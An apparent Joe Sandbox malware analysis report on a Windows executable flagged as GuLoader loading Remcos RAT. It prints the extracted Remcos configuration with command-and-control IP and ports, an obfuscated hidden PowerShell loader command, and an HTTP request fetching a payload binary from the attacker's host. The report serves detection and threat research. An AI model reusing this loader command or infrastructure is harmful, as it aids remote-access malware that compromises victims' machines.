Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Q20240425 MAX5073626.com.exe

Overview

General Information

Sample name:Q20240425 MAX5073626.com.exe
Analysis ID:1431846
MD5:1c089552c29f12843d8cd8e2bbf5cf5b
SHA1:6f3e611fc7d7d5938b99575bcd96366d6e213eab
SHA256:76dbfa281b158a18c83d08a907f087b7330da28bdd2298eb9ee2f23c1df40491
Tags:exe
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Powershell drops PE file
Suspicious powershell command line found
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Q20240425 MAX5073626.com.exe (PID: 6544 cmdline: "C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe" MD5: 1C089552C29F12843D8CD8E2BBF5CF5B)
    • powershell.exe (PID: 6636 cmdline: "powershell" -windowstyle hidden "$Annotationerne139=cat 'C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta';$Rhinocerotiform=$Annotationerne139.substring(32760,3);.$Rhinocerotiform($Annotationerne139)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7096 cmdline: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • wab.exe (PID: 3844 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": "193.239.86.203:3702:1193.239.86.203:4089:1193.239.86.203:4093:1193.239.86.203:2700:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-UI3GST", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000007.00000002.2923725946.0000000006DEF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000001.00000002.2195976842.000000000A319000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: wab.exe PID: 3844JoeSecurity_RemcosYara detected Remcos RATJoe Security

          System Summary

          barindex
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6636, TargetFilename: C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\Q20240425 MAX5073626.com.exe
          Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell" -windowstyle hidden "$Annotationerne139=cat 'C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta';$Rhinocerotiform=$Annotationerne139.substring(32760,3);.$Rhinocerotiform($Annotationerne139)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6636, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", ProcessId: 7096, ProcessName: cmd.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -windowstyle hidden "$Annotationerne139=cat 'C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta';$Rhinocerotiform=$Annotationerne139.substring(32760,3);.$Rhinocerotiform($Annotationerne139)", CommandLine: "powershell" -windowstyle hidden "$Annotationerne139=cat 'C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta';$Rhinocerotiform=$Annotationerne139.substring(32760,3);.$Rhinocerotiform($Annotationerne139)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe", ParentImage: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe, ParentProcessId: 6544, ParentProcessName: Q20240425 MAX5073626.com.exe, ProcessCommandLine: "powershell" -windowstyle hidden "$Annotationerne139=cat 'C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta';$Rhinocerotiform=$Annotationerne139.substring(32760,3);.$Rhinocerotiform($Annotationerne139)", ProcessId: 6636, ProcessName: powershell.exe

          Stealing of Sensitive Information

          barindex
          Source: Registry Key setAuthor: Joe Security: Data: Details: BD FD BB C6 BA E4 28 8F B3 3F 05 34 5E 76 16 7A 83 04 08 79 5A 23 FD 1C AF B4 67 84 DF EC 56 44 DA C5 4E F4 A0 C2 D5 17 77 E0 72 AF 73 91 8D B4 A1 C4 91 AA 32 8E A9 92 93 37 71 F7 8F D8 EE 33 3F 74 76 3A DC 09 33 29 85 06 75 E1 7F 2A 2B 7A F8 F3 B7 B2 D2 D0 1F 60 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 3844, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-UI3GST\exepath
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
          Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
          Source: 00000007.00000002.2923725946.0000000006DEF000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "193.239.86.203:3702:1193.239.86.203:4089:1193.239.86.203:4093:1193.239.86.203:2700:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-UI3GST", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
          Source: C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\Q20240425 MAX5073626.com.exeReversingLabs: Detection: 13%
          Source: C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\Q20240425 MAX5073626.com.exeVirustotal: Detection: 20%Perma Link
          Source: Q20240425 MAX5073626.com.exeReversingLabs: Detection: 13%
          Source: Q20240425 MAX5073626.com.exeVirustotal: Detection: 21%Perma Link
          Source: Yara matchFile source: 00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2923725946.0000000006DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: wab.exe PID: 3844, type: MEMORYSTR
          Source: Q20240425 MAX5073626.com.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Q20240425 MAX5073626.com.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2191279426.0000000007152000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: m.Core.pdbMn source: powershell.exe, 00000001.00000002.2195123404.00000000083B7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5O source: powershell.exe, 00000001.00000002.2185997052.0000000002CB1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: lambda_methodCore.pdbt/ source: powershell.exe, 00000001.00000002.2195123404.00000000083B7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.2191279426.0000000007152000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeCode function: 0_2_00402B75 FindFirstFileW,0_2_00402B75
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeCode function: 0_2_0040673F GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040673F
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeCode function: 0_2_004065F5 FindFirstFileW,FindClose,0_2_004065F5
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

          Networking

          barindex
          Source: Malware configuration extractorURLs: 193.239.86.203
          Source: global trafficTCP traffic: 193.239.86.203 ports 4089,4093,0,2700,8,80,3702
          Source: global trafficTCP traffic: 192.168.2.4:49738 -> 193.239.86.203:4089
          Source: Joe Sandbox ViewASN Name: MERITAPL MERITAPL
          Source: global trafficHTTP traffic detected: GET /XWJPh99.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 193.239.86.203Cache-Control: no-cache
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.203
          Source: global trafficHTTP traffic detected: GET /XWJPh99.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 193.239.86.203Cache-Control: no-cache
          Source: wab.exe, 00000007.00000002.2923725946.0000000006D88000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2924069038.0000000007000000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://193.239.86.203/XWJPh99.bin
          Source: wab.exe, 00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.239.86.203/XWJPh99.binW
          Source: Q20240425 MAX5073626.com.exe, Q20240425 MAX5073626.com.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_Error...
          Source: powershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000001.00000002.2186655798.0000000004C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000001.00000002.2186655798.0000000004AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000001.00000002.2186655798.0000000004C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000001.00000002.2186655798.0000000004AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: powershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000001.00000002.2186655798.0000000004C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeCode function: 0_2_00404B65 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404B65

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2923725946.0000000006DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: wab.exe PID: 3844, type: MEMORYSTR

          System Summary

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\Q20240425 MAX5073626.com.exeJump to dropped file
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_0583D53D Sleep,NtProtectVirtualMemory,7_2_0583D53D
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeCode function: 0_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036D7
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeFile created: C:\Windows\resources\0809Jump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeCode function: 0_2_004071460_2_00407146
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeCode function: 0_2_004044530_2_00404453
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0462F0001_2_0462F000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0462F8D01_2_0462F8D0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0462ECB81_2_0462ECB8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_074EBB581_2_074EBB58
          Source: Q20240425 MAX5073626.com.exeStatic PE information: Resource name: RT_VERSION type: 0420 Alliant virtual executable common library not stripped
          Source: Q20240425 MAX5073626.com.exe.1.drStatic PE information: Resource name: RT_VERSION type: 0420 Alliant virtual executable common library not stripped
          Source: Q20240425 MAX5073626.com.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/11@0/1
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeCode function: 0_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036D7
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeCode function: 0_2_004040BA GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,EnableWindow,0_2_004040BA
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeCode function: 0_2_0040234F CoCreateInstance,0_2_0040234F
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeFile created: C:\Users\user\AppData\Local\RadioactiniumJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_03
          Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-UI3GST
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeFile created: C:\Users\user\AppData\Local\Temp\nstD63D.tmpJump to behavior
          Source: Q20240425 MAX5073626.com.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Q20240425 MAX5073626.com.exeReversingLabs: Detection: 13%
          Source: Q20240425 MAX5073626.com.exeVirustotal: Detection: 21%
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeFile read: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe "C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe"
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -windowstyle hidden "$Annotationerne139=cat 'C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta';$Rhinocerotiform=$Annotationerne139.substring(32760,3);.$Rhinocerotiform($Annotationerne139)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -windowstyle hidden "$Annotationerne139=cat 'C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta';$Rhinocerotiform=$Annotationerne139.substring(32760,3);.$Rhinocerotiform($Annotationerne139)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeSection loaded: wintypes.dllJump to behavior
